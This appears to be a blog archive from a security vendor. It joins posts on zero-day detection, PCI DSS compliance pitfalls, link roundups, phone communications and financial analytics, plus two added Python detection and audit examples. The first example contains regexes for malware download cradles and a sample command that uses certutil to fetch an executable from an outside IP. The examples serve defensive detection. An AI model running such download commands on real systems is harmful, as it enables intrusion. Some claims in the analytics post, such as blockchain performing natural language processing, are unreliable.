Introduction Recently, an AlienVault customer reached out to ask how AlienVault handles the detection of zero-day attacks, which are exploits against previously unknown vulnerabilities. In this blog, I shed light on how we approach this. Modern security products rely on some definition of threats, whether that definition is as specific as a signature that identifies a unique strain of malware or as general as a behavior pattern that threat actors employ broadly across different strains of malware. The challenge of security is keeping those definitions up to date as attacks emerge and evolve in the wild every single day. Most organizations outside of the Fortune 500 do not have the resources to tackle this challenge on their own. There are a few approaches to staying ahead of the always-shifting threat landscape and new zero-day attacks. One is to discover vulnerabilities before threat actors discover them and figure out how to exploit them. Another is to identify an active exploit in the wild early and to quickly update your defenses to detect and respond to it. AlienVault uses both of these approaches to keep our customer environments secure in the face of zero-day attacks. Let’s take a deeper look at how. Early Access to New Vulnerability Information One way to stay ahead of emerging threats is to know about the vulnerability before threat actors have an opportunity to exploit it. As soon as a new software vulnerability or security flaw becomes public knowledge, threat actors go to work, taking advantage of the time it takes for security vendors to update their tools and for security teams to then identify and patch their vulnerable systems. That’s why it’s a security best practice for security researchers to inform vendors of new threats and vulnerabilities before they announce them to the general public. For example, AlienVault participates in the Microsoft Active Protections Program (MAPP). 
Through this program, AlienVault Labs receives early access to new vulnerability information for Microsoft and Adobe products before Microsoft publishes it in its monthly security update. This allows us to update the defenses in USM Anywhere ahead of a public announcement, giving our customers a headstart in identifying and remediating the vulnerabilities in their environments. Discovering Zero-Day Attacks as they Emerge in the Wild Of course, the “good guys” are not always the first to discover new vulnerabilities. All too often, threat actors find and exploit vulnerabilities before vendors have the opportunity to discover and release patches for them. Thus, zero-day vulnerabilities are often discovered after they’ve been exploited in a successful zero-day attack. That’s why it’s important to have a constant watchful eye on the global threat landscape as well as the ability to operationalize new threat information as soon as it becomes available. The Power of the Global Threat Intelligence Community AlienVault has a couple of strategies here. First, AlienVault USM Anywhere is unique in its ability to detect zero-day attacks thanks to its direct integration with the Open Threat Exchange (OTX), the world’s largest open threat intelligence sharing community. The global OTX community of over 100,000 security researchers and practitioners contribute 19 million pieces of threat data daily, and they often alert the community within the initial minutes or hours of discovering an attack in the wild. This threat data is available to any OTX user to consume in their security tools. For AlienVault USM Anywhere users, OTX threat data is integrated and ready to use in the platform. Users can subscribe to any OTX Pulse to enable security alerting on the indicators of compromise (IOCs) published within that pulse. Users can also subscribe to email notifications to stay aware of specific attacks, threat actors, or malware families as they evolve. 
AlienVault Labs Security Research Team In addition to the community-powered threat data shared in OTX, USM Anywhere receives continuous and automatic threat intelligence from the AlienVault Labs Security Research Team. This team works on behalf of all USM Anywhere customers, monitoring the global threat landscape daily, analyzing threats with a combination of human and machine intelligence, and curating the threat intelligence that is delivered continuously and automatically to USM Anywhere. AlienVault Threat Intelligence is ready to use and is written to proactively detect higher-level activities, patterns, and behaviors to effectively automate threat hunting activities across customer environments. Behavioral-Based Detection Detecting threats based on IOCs like file hashes and IP addresses enables security teams to identify emerging attacks quickly and with higher confidence. Yet, alone, IOCs are fairly volatile, as threat actors can alter them very quickly, easily, and even automatically: a recompiled binary has a new hash, and a new command-and-control server has a new IP address. Less volatile are the tactics, techniques, and procedures (TTPs) that threat actors use (and reuse) to carry out attacks. Think of these as the recipe for the attack; they are the high-level tasks performed at each stage of the attack. These steps are often the same across different malware or campaigns, so detecting them holds up better than matching indicators alone. For example, consider a network attack. The initial network intrusion may be done using a brand new, unidentified vulnerability. But once the threat actor gains access to the system she attacked, her recipe calls for downloading the tools needed to move laterally in the network and extract data. These tools can be identified when they are downloaded or when they communicate on the network. They are independent of the initial zero-day vulnerability that was exploited to gain access, so we can still detect the intrusion by detecting the other tools used in the attack. 
To do this, AlienVault Labs uses machine learning algorithms to extract threat characteristics and cluster samples in order to identify known and unknown threats. These clusters are based on observed network behavior, OS interactions, and more. The algorithms further analyze these clusters to identify anomalous behavior. The AlienVault Labs team uses this information to codify the tactics, techniques, and procedures, which are packaged as correlation rules and delivered continuously to USM Anywhere as part of the threat intelligence subscription. Using this strategy, AlienVault was able to detect the "ALPC zero day" months before it was identified in the wild and an IOC was written for it. This exploit abuses a flaw in the Windows Task Scheduler’s SchRpcSetSecurity method, exposed over the ALPC (Advanced Local Procedure Call) interface: the method failed to check the caller’s permissions before changing a file’s security descriptor, which let a local user take control of protected files and obtain SYSTEM privileges. AlienVault Labs detected this privilege escalation technique with generic detection mechanisms that are resilient to a changing attack vector. In other words, they came up with a way to detect this type of privilege escalation that is independent of the exploit it is wrapped in, so any attack, even a zero day, that uses this technique is identified. Another example is the well-known Apache Struts vulnerability. When the exploit first appeared, there was no signature for it. However, once attackers were on a system, they dropped a webshell to communicate back to their operators, and AlienVault USM Anywhere was already able to detect that webshell because it had been used by other attackers in previous campaigns as part of their TTPs. Summary In this blog post, I’ve outlined a few of the techniques that AlienVault leverages to detect emerging and evolving threats, including zero-day attacks. To quickly summarize: Early access to new vulnerability information allows us to update the vulnerability signatures in USM Anywhere ahead of public release. 
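To make the IOC-versus-TTP distinction concrete, here is an added Python example; it is not AlienVault’s correlation rule format or code from the post. It runs a hash-based IOC check and two behaviour-based rules over a handful of constructed process-creation events: a web server process spawning a shell, which is what a webshell looks like from the host, and a download cradle used to fetch post-exploitation tooling. The hashes, hosts and command lines are made up, and the blocklisted hash, the image-name sets and the regular expressions are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, as a host sensor or EDR would report it."""
    host: str
    parent: str    # image name of the parent process
    image: str     # image name of the newly created process
    cmdline: str
    sha256: str    # hash of the executed image


# Constructed IOC: the hash of one known build of a credential-dumping tool.
# The value is a placeholder, not a real sample hash.
KNOWN_BAD_HASHES = {"aaaa1111" * 8: "credential-dumper build A"}

# Constructed TTP definitions. These describe behaviour, so they keep working
# when the attacker recompiles a tool or swaps the initial exploit.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd", "nginx", "java", "php-fpm", "tomcat"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "sh", "bash", "dash"}
DOWNLOAD_CRADLES = [
    re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I),                       # certutil as a downloader
    re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest)\b", re.I),  # PowerShell cradles
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b", re.I),               # download piped into a shell
]


def ioc_hits(ev):
    """Signature-style check: is the executed image a known-bad hash?"""
    name = KNOWN_BAD_HASHES.get(ev.sha256.lower())
    return [f"ioc:{name}"] if name else []


def ttp_hits(ev):
    """Behaviour-style checks that do not depend on the file hash."""
    hits = []
    if ev.parent.lower() in WEB_SERVER_IMAGES and ev.image.lower() in SHELL_IMAGES:
        hits.append("ttp:webshell-spawns-shell")
    if any(p.search(ev.cmdline) for p in DOWNLOAD_CRADLES):
        hits.append("ttp:tool-download-cradle")
    return hits


def detect(events):
    """Run both rule families and return (host, image, rule) findings."""
    return [(ev.host, ev.image, rule)
            for ev in events
            for rule in ioc_hits(ev) + ttp_hits(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Known build of the tool: the IOC fires.
    ProcessEvent("web01", "explorer.exe", "dump.exe", "dump.exe sekurlsa", "aaaa1111" * 8),
    # Same tool recompiled: new hash, so a hash-only IOC is silent.
    ProcessEvent("web01", "explorer.exe", "svc.exe", "svc.exe sekurlsa", "bbbb2222" * 8),
    # Webshell in action: the IIS worker process spawns a command shell.
    ProcessEvent("web01", "w3wp.exe", "cmd.exe", 'cmd.exe /c "whoami"', "cccc3333" * 8),
    # Post-exploitation: fetching more tooling with a living-off-the-land binary.
    ProcessEvent("web01", "cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://198.51.100.7/t.exe t.exe", "dddd4444" * 8),
    # Benign: an administrator runs PowerShell from the desktop.
    ProcessEvent("ws07", "explorer.exe", "powershell.exe", "powershell.exe Get-Process", "eeee5555" * 8),
]

if __name__ == "__main__":
    for host, image, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {rule}")
```

The recompiled tool (second event) produces nothing at all, which is the gap the post describes; the webshell and the certutil download are still caught, because those rules key on what the process does rather than what it hashes to. In production the same idea is expressed as parent/child process and command-line correlation rules rather than ad hoc regexes.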
OTX acts as an early warning system of experts around the world, and they are bolstered by our internal threat team to quickly find and analyze new attacks. Advanced detection techniques like identification of behaviors and TTPs means AlienVault can detect many zero-day attacks even if the IOCs change frequently. See the table below for some examples of how these efforts have resulted in early detection of several different recent threats by USM Anywhere. Vulnerabilities and Zero-day Attack Examples that USM Anywhere Defends Against
Despite the fact that PCI DSS has been in effect for over a decade, and most merchants are achieving compliance, some of the world’s largest retailers have been hit by data breaches. The sad truth is that achieving compliance doesn’t guarantee data protection, even for large organizations. For example, more than five million credit card numbers were stolen in 2018 hacks of two major retailers. Earlier this year, I hosted a webcast with Jacques Lucas from Terra Verde (one of our partners) covering challenges and best practices for achieving and maintaining compliance with PCI DSS. In his role as a QSA, Jacques has "seen it all" in terms of what commonly causes stumbling blocks for organizations on their compliance journey, which he summarized in a slide covering the Top 10 Pitfalls for PCI DSS Compliance. As a follow-on from the webcast, I wanted to dive into that area further to provide tips and best practices to help companies address those Top 10 Pitfalls for PCI DSS. 1. Improper scoping The PCI DSS standard defines the scope of the cardholder data environment (CDE) as all of the systems, people, processes, and technologies that store, process, or transmit cardholder data. A common mistake is to overlook the systems that support and secure the CDE and fail to include them in scope. Specifically, any system connected to the CDE or involved in managing the security of in-scope systems is also considered in scope, and needs to be secured and monitored. Some examples include: IAM servers; domain controllers; key management servers; firewalls/IDS/IPS systems; log management/SIEM systems; AV management servers; and more. Pro-tip: Segmentation and monitoring are the two critical success factors in avoiding the pitfalls associated with improper scoping. Isolate in-scope assets from the rest of your environment with granular network segmentation and access control policies. Additionally, monitor all access activity to validate compliance and respond to emerging risks.
2. Failing to patch systems regularly PCI DSS requirement 6 outlines the need to patch systems on a regular basis. Specifically, requirement 6.2 requires that critical security patches be installed within one month of their release. The challenge is that patching processes can be very disruptive, and even well-established companies can easily fall behind. For example, in one high profile breach it took the company more than four months to identify an unpatched vulnerability that provided a foothold for their devastating data breach. Pro-tip: Identifying unpatched assets and applications is a must. Be sure you schedule regular vulnerability assessment scans and prioritize patching and remediation procedures for your in-scope systems. Monitor your in-scope systems with a combination of security controls including host-based and network-based IDS, file integrity monitoring, and SIEM event correlation. 3. Failing to audit access to cardholder data PCI DSS requirement 8 covers identifying and authenticating access to system components; requirement 8.3 specifically requires multi-factor authentication for all remote network access into the CDE and for all non-console administrative access. While many organizations have implemented multi-factor authentication, they often fail to audit this access to verify that the controls are working as expected. In fact, SecurityMetrics reports that insecure remote access was the largest single origin of compromise, used in more than 39% of investigated breaches against merchants. Pro-tip: Require multi-factor authentication for every remote and administrative login to your CDE assets. Schedule periodic audits against these assets to verify that the controls are working properly. Additionally, enable monitoring on all CDE assets to capture a baseline of normal access (who, from where, and when). Finally, configure your SIEM to trigger alarms for activity that falls outside this baseline so you can respond quickly to potential threats.
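Much of the auditing behind pitfalls 2 and 3 can be scripted against an asset inventory and a remote-access log. The following Python example is added here and is not part of the webcast or Terra Verde’s material. It checks a constructed set of in-scope assets against the one-month window for critical patches, and flags remote logins to CDE hosts that lack MFA or fall outside a baseline of expected hours and source networks. All host names, patch identifiers, addresses, timestamps and the baseline values are made up for the example.

```python
import ipaddress
from datetime import date, datetime, timedelta

# --- Pitfall 2: critical patches within a month of release (requirement 6.2) ---
# Constructed CDE inventory. Hosts, patch identifiers and dates are made up.
ASSETS = [
    {"host": "pos-db01", "in_scope": True, "role": "cardholder database",
     "critical_patches": [{"id": "PATCH-A", "released": date(2018, 9, 2), "installed": None}]},
    # A domain controller that authenticates CDE systems is in scope too (pitfall 1).
    {"host": "dc01", "in_scope": True, "role": "domain controller",
     "critical_patches": [{"id": "PATCH-B", "released": date(2018, 10, 20), "installed": date(2018, 10, 28)}]},
    {"host": "jump01", "in_scope": True, "role": "remote access gateway",
     "critical_patches": [{"id": "PATCH-C", "released": date(2018, 10, 1), "installed": None}]},
    {"host": "wiki01", "in_scope": False, "role": "intranet wiki",
     "critical_patches": [{"id": "PATCH-D", "released": date(2018, 8, 1), "installed": None}]},
]
AUDIT_DATE = date(2018, 11, 15)  # constructed "today" for the audit run


def patch_sla_violations(assets, today, max_days=30):
    """Return (host, patch id, days) for in-scope critical patches past the window.

    A patch still missing is measured up to `today`; an installed one up to its
    install date, so a late install still shows up in the audit trail.
    """
    window = timedelta(days=max_days)
    violations = []
    for asset in assets:
        if not asset["in_scope"]:
            continue
        for patch in asset["critical_patches"]:
            done_by = patch["installed"] or today
            age = done_by - patch["released"]
            if age > window:
                violations.append((asset["host"], patch["id"], age.days))
    return violations


# --- Pitfall 3: MFA on remote access to the CDE, audited against a baseline (requirement 8.3) ---
CDE_HOSTS = {a["host"] for a in ASSETS if a["in_scope"]}

# Constructed baseline: where and when remote access to the CDE is expected.
BASELINE = {
    "known_sources": [ipaddress.ip_network("203.0.113.0/24"),
                      ipaddress.ip_network("198.51.100.0/24")],
    "hours": range(7, 19),  # 07:00 to 18:59 UTC
}

# Constructed remote-access log entries, as a VPN or gateway would export them.
REMOTE_ACCESS_LOG = [
    {"ts": "2018-11-14T08:02:11", "user": "jdoe", "src": "203.0.113.5", "dst": "jump01", "mfa": True},
    {"ts": "2018-11-14T23:41:07", "user": "svc_backup", "src": "198.51.100.9", "dst": "pos-db01", "mfa": False},
    {"ts": "2018-11-15T02:15:30", "user": "jdoe", "src": "203.0.113.5", "dst": "jump01", "mfa": True},
    {"ts": "2018-11-15T03:10:00", "user": "jdoe", "src": "192.0.2.44", "dst": "jump01", "mfa": False},
    {"ts": "2018-11-15T11:00:00", "user": "asmith", "src": "192.0.2.44", "dst": "wiki01", "mfa": False},
]


def remote_access_findings(log, cde_hosts, baseline):
    """Flag remote logins to CDE hosts that lack MFA or fall outside the baseline."""
    findings = []
    for entry in log:
        if entry["dst"] not in cde_hosts:   # out-of-scope hosts are not audited here
            continue
        when = datetime.fromisoformat(entry["ts"])
        src = ipaddress.ip_address(entry["src"])
        if not entry["mfa"]:
            findings.append((entry["user"], entry["dst"], "remote-access-without-mfa"))
        if when.hour not in baseline["hours"]:
            findings.append((entry["user"], entry["dst"], "outside-baseline-hours"))
        if not any(src in net for net in baseline["known_sources"]):
            findings.append((entry["user"], entry["dst"], "unknown-source-network"))
    return findings


if __name__ == "__main__":
    for host, patch, days in patch_sla_violations(ASSETS, AUDIT_DATE):
        print(f"{host}: {patch} outstanding for {days} days (limit 30)")
    for user, dst, issue in remote_access_findings(REMOTE_ACCESS_LOG, CDE_HOSTS, BASELINE):
        print(f"{user} -> {dst}: {issue}")
```

Run against the constructed data, the patch check reports the cardholder database and the jump host (74 and 45 days outstanding) and stays quiet about the domain controller, which was patched in eight days; the access check reports the service account that reached the database at night without MFA and the login to the jump host from an unknown network. The same logic maps directly onto SIEM correlation rules once the inventory and the VPN log are feeding the platform.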
Today, we are happy to share that Graham Pearson has been appointed Vice President of Asia Pacific (APAC) for AlienVault, an AT&T company. In this role, Graham will lead our operations and sales strategy in the region. He is excited about joining AlienVault and providing APAC companies with the unified security management approach they need in moving to the cloud and keeping up with today’s evolving threats. “Joining AlienVault is a huge opportunity for me; it’s the right time and they have the right product at the right price for enabling fast, effective threat detection and response.” With more than 30 years of sales experience in the IT industry, 22 of those in cybersecurity, Graham has worked with Fortune 500 companies and fast growing start-ups. Most recently, he was Vice President for Okta, an identity management company, in APAC. In four years, he grew Okta’s Australian office from one employee to 50, supporting 400+ customers in the sales territory. Graham’s experience includes sales leadership roles for Oracle’s Security and Identity Management solution and Security Business Unit within the Fusion Middleware space. He also held various sales positions at CA Technologies and Websense for security products. When Graham is not working, he enjoys spending time with his wife and two kids, ages 17 and 13. Here’s more about Graham’s journey to AlienVault! Here’s a picture of Graham with his wife, Leila, while vacationing in Las Vegas.
Another week, another trove of articles I read so that I could bring you only the best. Because that’s just the kind of person I am. You’re welcome. A SOCless detection team I can’t remember if I shared this article a few months back, and I’m too lazy to go take a look, but it’s worth revisiting. We don’t talk about threat detection and response without mentioning a SOC in the same breath. But a SOC is just one mechanism to facilitate the desired outcome. What if we could achieve the same result, but without a SOC? A SOCless detection team at Netflix | Linkedin Related Threat Detection Is A Multi-Stage Process | Gartner blogs Hey there! How much are you worth? Have you ever stopped to think just how much your life is worth? I mean really think about it. For instance, let’s say you wanted to sell everything you have – your house, your car, your job, your private life, photos and home movies from your childhood, your accounts on various social media, your medical history and so on – how much would you ask for it all? Hey there! How much are you worth? | Securelist US Cyber Command starts uploading foreign APT malware to VirusTotal I think this is a good move; the more sharing, the better for defensive security, right? Of course there are always caveats and scenarios where one would not share, but broadly speaking I hope more companies and government departments jump on board. The Cyber National Mission Force (CNMF), a subordinate unit of US Cyber Command (USCYBERCOM), set in motion a new initiative through which the DOD would share malware samples it discovered on its networks with the broader cybersecurity community. The CNMF kicked off this new project by creating an account on VirusTotal, an online file scanning service that also doubles as an online malware repository, and by uploading two malware samples. US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet You're Going To Get Breached -- So How Should You Respond? 
We live in an age in which the rate of technological advancement is unparalleled. But of course, with new technologies come new security vulnerabilities. The best example being the imminent arrival of 5G and the rise of connected devices, which alone already present numerous vulnerabilities. According to Ponemon Institute's 2017 State of Cybersecurity in Small & Medium-Sized Businesses (SMB) report, 52% of organizations are not confident their current anti-virus software will protect them from ransomware. Even with the rise of artificial intelligence in cybersecurity and enhanced defensive software capabilities, hackers have shown themselves to be consistently one step ahead. With this in mind, businesses need to stop asking, “Will I be hacked?” and instead tackle the inevitable question, “When will I be hacked?” You're Going To Get Breached -- So How Should You Respond? | Forbes Destroy Logs, Hide Attacks Apparently hacker groups are increasingly turning to log file destruction and other destructive methods as a means to hide their tracks. Nothing really new here. I remember once messing up a change as a young secops admin, and erased the logs to cover up my mistake. But that’s a story for another time. Hackers are increasingly destroying logs to hide attacks | ZDNet Finding Gold in the Threat Intelligence Rush Threat intelligence feeds, sold for hundreds of thousands of dollars per year, are marketed on a specific premise: If an entity is seen acting maliciously in one place, it can be expected in others. But is that always true? 
Finding Gold in the Threat Intelligence Rush | Dark Reading DJI plugs security flaws that could have enabled access to users’ data and drone images If exploited, the vulnerability would have given an attacker full access to a user’s account and the information within it, including video footage and photos taken by their drones as well as flight paths, GPS locations and other confidential data, without the user being aware of any intrusion. Alexa, what’s the best way to burn a drone? DJI plugs security flaws that could have enabled access to users’ data and drone images | HelpNetSecurity Oracle’s VirtualBox vulnerability leaked by disgruntled researcher An independent researcher who was disgruntled with traditional bug bounty methods took it upon himself to leak the details of an exploit in Oracle’s VirtualBox without first informing Oracle. Sergey Zelenyuk discovered a flaw that would allow him to escape from the virtual environment of the guest machine to reach the Ring 3 privilege layer used for running code from most user programs with the least privileges. Oracle’s VirtualBox vulnerability leaked by disgruntled researcher | SC Magazine Other stories and articles I found interesting this week Retail focus is key to Alibaba’s new London datacentre | Computer Weekly What it takes to be a ‘Chief Data Officer’ in 2018 | IT Pro Portal How Amazon Makes Money: Amazon Business Model in a Nutshell | FourweekMBA
Are you familiar with all the ways that your smart phone communicates? The other evening, at dinner, I was describing to a friend how the VPN software I use on my phone masks my location when I am on the internet. Sometimes I am in Helsinki, and other times I may be in another part of the world. My friend asked, “How expensive are your data charges for all the texts you receive while you are masquerading around the globe?” I realized that she was unfamiliar with all the ways that a smart phone communicates. Others at the table were also curious. You have probably heard about how the smart phone in your pocket is more powerful than the computer that powered the Apollo space missions. Not only is your phone computationally more powerful, but it can also communicate across more conduits, most of which did not exist back in those early days of space exploration. These technologies are separate and distinct. Here are some non-technical explanations that we, as InfoSec professionals, should share with our friends and family about how a phone communicates: Text messages and phone calls rely on a cell number in order to function. This is tied to the Subscriber Identity Module (the SIM card), which resides in the phone and identifies your subscription to the carrier. Anyone who can access your SIM card can make phone calls under your identity and, sadly, leave you holding the bill. This is why it is very important to report a lost phone to your cell phone provider. It does not matter if your phone is password protected: unless you have set a SIM PIN, the SIM card can be moved into any similar unlocked phone and used to make phone calls. Internet and other data connections are carried over IP. The phone relies on information from the SIM card to determine the carrier, but data does not use the same pathway as a text message. That is why using a VPN does not result in international text charges. You can connect to any Wi-Fi network in the absence of a SIM card. 
The Wi-Fi signal does not need a phone number or a carrier to communicate. It relies on the Wi-Fi provider to complete its connection. Of course, you cannot receive text messages without a SIM card, even on Wi-Fi. Your phone will usually remind you that there is no SIM card installed.

Recently, 75% of Americans experienced a test of the “Presidential Alert” system. Even if your phone was in silent mode, the alert triggered the klaxon-level alarm on the device. This raised some speculation by none other than the comically adorable John McAfee about the presence of an “E911” chip on the phone. Bruce Schneier commented that, “This is, of course, ridiculous. I don't even know what an E911 chip is. And -- honestly -- if the NSA wanted in your phone, they would be a lot more subtle than this.”

Remember that there are also both Bluetooth and Near Field Communication (NFC) capabilities on your phone. These are usually used in conjunction with the other communication features. For example, you can connect to the Bluetooth in your automobile and then use the phone to make a phone call. Although Bluetooth and NFC have very short-range capabilities, they are yet another method by which your phone communicates with an external entity.

The smart phone is truly a remarkable technological achievement. I wonder if most folks who own a smart phone have ever considered the various ways that these devices communicate, and one has to wonder how much they communicate without our knowledge or permission. Excuse me while I go and put my phone in the refrigerator.
The use of big data and data from the internet of things (IoT) is changing business so rapidly that it is hard to predict what is next, and financial analytics is certainly no exception. While the need for financial analysts continues to rise, the way analysts perform their day-to-day functions is evolving. More data than ever before goes into the evaluation of company financials, market analysis, and investment predictions. A company’s decision to issue bonds, split stock, or even initiate stock buyback options is much better informed than ever before. So where are data and financial analytics taking us in 2019? Here is a closer look.

Advanced Analytics and Data Science

Source: https://www.gartner.com/ngw/globalassets/en/information-technology/documents/insights/100-data-and-analytics-predictions.pdf

Data and analytics are more pervasive than ever in nearly every enterprise. They are increasingly the key to nearly every process a business engages in. These statistics tell the story best:

Deep neural networks, or deep learning, are in 80 percent of data scientists’ toolboxes.
By 2020, more than 40 percent of data science tasks will be automated.
Nearly 50 percent of analytics queries are done via natural language queries (voice) or are auto-generated.

In large part, this is due to wider adoption of artificial intelligence options. What this means for business and the future of analytics is simply this: by the end of 2019, 10 percent of IT hires will be writing scripts for bot interactions. In fact, according to the McKinsey Global Institute, despite the growth of both data and the use of artificial intelligence to analyze it, most companies are “only capturing a fraction of their potential value in terms of revenue and profit gains.” Their weaknesses, ones that can be solved with proper data and analytics, are many. Here are a few:

Inefficient matching of supply and demand.
Many companies are not taking advantage of analytics that can predict seasonal demand and annual lulls with amazing accuracy.

Prevalence of underutilized assets. Many businesses have assets that sit idle, or employees and departments duplicating tasks, something easily determined by honest analytics.

Dependence on demographic data rather than more efficient behavioral data. Behavioral data says a lot more about both clients and employees, and is much easier to use.

Over the next year, more companies will become dependent on analytics, and those companies that do not adapt will be three times more likely to fail.

The Blockchain, Predictive Analytics, and Security

What role does the blockchain play in all of this? The key is this: the blockchain security system is based on a shared ledger, a much more transparent way of saving data. Predictive analytics — essentially the ability to predict the future with some accuracy — requires a lot of data and, until recently, a lot of specialized training. This is because data scientists are a new breed and help determine what data is appropriate for the predictive model. The more data produced, the more accurate the prediction. Thousands or sometimes even millions of data points are needed.

This data analysis is directly related to real-time decision making, and predictive analytics leads to goal setting and future business planning. These are all things business analysts learn through coursework and on-the-job training and understanding. Blockchain, because of the shared computing power it uses, can use natural language processing to determine the defining boundaries of the data to be analyzed. As mentioned above, more natural language queries than ever before will be posed, and blockchain has the ability to bring the power of artificial intelligence to even the smallest of businesses. Along with this power comes the security of blockchain and the stability of the data created (a complex discussion in and of itself).
Multiple Expansion and a Bullish Market

Source: https://www.cnbc.com/2018/09/04/credit-suisse-releases-bullish-2019-stock-market-target.html

From this financial analysis, Credit Suisse has given us our first financial predictions for 2019: it is going to be a bullish year, with annual gains of around 11.4 percent. That could mean that the Fed’s recent decisions to raise rates could be right on. Why? Because, according to the artificial intelligence of the San Diego-based company Intensity, the next recession in the U.S. is expected to begin in 2019.

What is this artificial intelligence method, and how does it compare to its human counterparts? The company’s forecasting “engine” relies on continual model updating, much like data scientists depend on analyzing the latest data. In fact, the company is comprised of data scientists, statisticians, and PhDs. The engine takes real-time data and feeds it into several different models, which it combines to make predictions that vary with real-time conditions. You can look at the latest prediction here, which says that a recession is 82 percent likely in the next 12 months and sets the likelihood at over 50 percent in March of 2019.

As 2019 approaches, this kind of data, fed into artificial intelligence and deep learning models, will impact how more companies than ever do business. While we can’t take the human factor out of the equation, it seems we are becoming more and more predictable — or the machines are just getting better at it. But as always, predictions, even those with supporting data, can be wrong. All we can do is work with the data and improve our odds of the predictions being right.
It’s November already, where has the year gone? I can almost still remember typing out the words for the year’s first ‘Things I hearted’ blog back in January. Re-reading it now, it feels as if not much has changed; big messes, breaches, and in-fighting seemed like the usual for the year. I was speaking with my colleague Chris Doman a couple of days ago, and he did point out that 2018 overall has largely been better because we haven’t seen any large scale attack like WannaCry. He did pause and then add “yet” - so I suppose you could say we’ve improved because this year has caused less havoc than last year? Let’s chalk risk reduction down as a win and get on with it.

IBM Acquired Red Hat

A few weeks ago, prior to the announcement of the acquisition, IBM came up in discussion with a few friends and one of them said that IBM is one of those companies that everyone has heard of, but hardly anyone knows what they exactly do outside of a few services they use. As the cool kids say, this may have been a statement designed to “throw shade” (young and hip people, please correct me if I’ve used the term incorrectly - I already embarrass my children enough by misusing lingo), but the fact is that the statement is rather true, only because most people are still trying to work out why IBM would shell out 33.4 Instagrams for Red Hat.

IBM acquires Red Hat, but what does that mean? | 451 Research blog
Why IBM bought Red Hat: It's all open source cloud, all the time | ZDNet
6 Things to Know About IBM's $34B Acquisition of Red Hat | CMS Wire
IBM’s old playbook | Stratechery

The Supply Chain

I won’t give any more air time to that ridiculous ‘grain of rice’ Bloomberg story. However, it did give everyone time to pause and think about the supply chain and how fragile it is. It’s easy to overlook the reliance businesses have on partners and their security. Dan Goodin took a peek behind the curtain of this shady practice and wrote on two supply-chain attacks.
Two new supply-chain attacks come to light in less than a week | Ars Technica

Would you Compromise Privacy for $850m?

Under pressure from Mark Zuckerberg and Sheryl Sandberg to monetize WhatsApp, Brian Acton pushed back as Facebook questioned the encryption he'd helped build and laid the groundwork to show targeted ads and facilitate commercial messaging. Acton also walked away from Facebook a year before his final tranche of stock grants vested. “It was like, okay, well, you want to do these things I don’t want to do,” Acton says. “It’s better if I get out of your way. And I did.” It was perhaps the most expensive moral stand in history. Acton took a screenshot of the stock price on his way out the door—the decision cost him $850 million.

WhatsApp Cofounder Brian Acton Gives The Inside Story On #DeleteFacebook And Why He Left $850 Million Behind | Forbes

On the topic of money for ads:

We posed as 100 Senators to run ads on Facebook. Facebook approved all of them. | Vice

On the other side of privacy:

Tim Cook blasts 'weaponisation' of personal data and praises GDPR | BBC

What are Everyone’s Kids Doing at School?

Another one to be filed under “what were they thinking?” - both the developers, and to be honest, do schools really need to share every minor detail via an online portal? What happened to good old-fashioned parent-teacher meetings?

Remini, a smartphone app that launched in 2013, aims to provide parents and educators with a social network to follow a child’s progress throughout school and their early life, documenting important milestones and letting parents share images with their child’s school. But Remini exposed these, and the personal information of its users, to the internet writ large, thanks to an API that let anyone pull the data without any sort of authentication. The data included email addresses, phone numbers, and the documented moments of the children as well as their profile photos, according to a researcher who discovered the issue.
'Remini' App Used by Schools Left Personal Info Open to the World | Motherboard

Pakistani Bank Has Millions Taken

Apparently Bank Islami Pakistan was subject to a massive attack where many customers reported seeing transactions on their cards abroad. It’s alleged that attackers were able to breach the data centre of the bank and sold the customer details. I found this interesting because Pakistani businesses probably have had lesser worries in the past. But as organisations such as banks go through a digital transformation, they are opening themselves up to a much broader range of threats, something they probably haven’t accounted for. It’s not too dissimilar to what we see in other parts of the world, where companies such as small or medium businesses didn’t use to get attacked as often, but now it’s pretty much a daily part of life.

Bank Islami Comes Under Biggest Cyber Attack of Pakistan’s History | Daily Punch

Explain TLS Easily

A good way to explain TLS to someone.

The Illustrated TLS Connection | @XargsNotBombs

How to Choose Which Conference to Attend

There’s no way to say this nicely, but there are just too many security conferences in the world today. I think it would be a good idea to try to emulate Tom Hanks from “The Terminal”, but instead of living in an airport, see if one can spend a whole year or half a year only going to conferences. Actually, that sounds like a terrible idea, don’t try it. But what makes a conference worth attending or not? I found a good post by Valerie Lyons which may help you decide.

Conference trick: how to choose worthwhile security and privacy events – and which to avoid | BH Consulting
This is a perspective from one of our MSSP partners, CyberHat.

Formula 1 is a serious business. It takes years of expertise and practical footwork to design, build and operate a winning Formula 1 team. It's easy to think that success depends on the car and the technology. But in reality, a cutting-edge engine in the best car in the world can’t win a race alone. Without an expert driver and a highly experienced and dedicated support team, you just can’t finish first.

When it comes to cybersecurity, everyone wants to win the race of protecting their assets and detecting and responding to threats to mitigate risk. Most organizations today will invest heavily in cyber security technology, buying it, integrating it and implementing it into the organization, yet very few will focus on the teams driving the technology, supporting and utilizing it. It’s a simple belief that if you get a good enough car, you don’t need to be a good driver, when the reality is exactly the opposite – if you’re a good enough driver, you can get a lot out of pretty much every car.

Today, more and more companies are looking for fully encompassing cyber security solutions and are gradually consolidating into Security Operations Centers (SOCs) to help manage their security issues, and this is a smart move. SOCs are where cybersecurity teams detect, analyze and respond to threats on an organization. Their core task is to use the tools and skills at hand in order to provide the organization with an ongoing, relevant and professional security posture. Yet in the current cybersecurity landscape, not all SOCs were created equal. It is important to understand what components are imperative for a SOC to be most effective.

Formula 1 fact: The best Formula 1 pit crew can refuel and change a tire in just 3 seconds. They are the best in their field and they are dedicated to a strong set of processes. This is true for the SOC team as well.
